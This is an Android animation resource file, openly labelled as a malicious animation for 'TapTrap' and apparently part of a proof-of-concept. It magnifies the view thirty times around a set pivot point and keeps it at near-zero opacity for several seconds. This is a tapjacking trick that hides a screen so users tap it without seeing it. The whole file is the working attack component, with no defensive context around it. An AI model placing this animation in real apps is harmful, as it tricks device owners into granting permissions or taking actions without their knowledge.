<?xml version="1.0" encoding="utf-8"?>
<!-- Malicious animation used for TapTrap -->
<set xmlns:android="http://schemas.android.com/apk/res/android">
    <scale
        android:fromXScale="30"
        android:toXScale="30"
        android:fromYScale="30"
        android:toYScale="30"
        android:pivotX="72%"
        android:pivotY="89.45%"
        android:repeatCount="1"
        android:duration="5000" />
    <alpha
        android:fromAlpha="0.0001"
        android:toAlpha="0.0001"
        android:repeatCount="1"
        android:duration="2999" />
</set>